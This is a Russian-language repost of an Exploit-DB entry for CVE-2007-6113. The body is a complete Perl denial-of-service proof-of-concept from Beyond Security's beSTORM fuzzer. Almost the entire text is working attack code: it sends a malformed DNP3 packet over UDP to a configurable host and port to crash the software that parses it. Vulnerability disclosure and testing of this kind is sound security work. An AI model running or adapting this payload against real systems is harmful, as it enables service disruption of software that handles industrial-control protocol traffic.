- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4347
- Проверка EDB
-
- Пройдено
- Автор
- BEYOND SECURITY
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2007-6113
- Дата публикации
- 2007-08-31
Код:
#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
# Attack vector:
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
# Module:
# DNP3
use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;
$SIG{INT} = \&abort;
my $host = '192.168.4.52';
my $port = 20000;
my $proto = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout = 1;
#Read command line arguments
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );
if (defined $opt{h}) {
usage()
}
$host = $opt{H} ? $opt{H} : $host;
$port = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;
my @commands = (
{Command => 'Send',
Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"},
{Command => 'Receive'},
);
###
# End user configurable part
###
#1. Create a new connection
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => $proto,
Type => $sockType,
Timeout => $timeout,
)
or die "socket error: $!\n\n";
print "connected to: $host:$port\n";
$sock->autoflush(1);
binmode $sock;
#2. communication part
foreach my $command (@commands)
{
if ($command->{'Command'} eq 'Receive')
{
my $buf = receive($sock, $timeout);
if (length $buf)
{
print "received: [$buf]\n";
}
}
elsif ($command->{'Command'} eq 'Send')
{
print "sending: [".$command->{'Data'}."]\n";
send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
}
}
#3. Close connection
close ($sock);
#The end
sub receive
{
my $sock = shift;
my $timeout = shift;
my $tmpbuf;
my $buf = "";
while(1)
{ # Example from perldoc -f alarm
eval {
local $SIG{ALRM} = sub { die "timeout\n" };
alarm $timeout;
my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time.
if ( !defined $ret or $ret == 0 )
{ #EOF
die "timeout\n";
}
alarm 0;
$buf .= $tmpbuf;
};
if ($@) { #time out
if($@ eq "timeout\n")
{
last;
}
else {
die "receive aborted\n";
}
}
} #while
return $buf;
}
sub abort
{
print "aborting...\n";
if ($sock)
{
close $sock;
}
die "User aborted operation\n";
}
sub usage
{
print "usage: $0 [-hHPt]\n";
print "-h\t: this help message\n";
print "-H\t: override default host - $host\n";
print "-P\t: override default port - $port\n";
print "-t\t: set socket timeout in seconds\n";
exit 0;
}
# milw0rm.com [2007-08-31]
- Источник
- www.exploit-db.com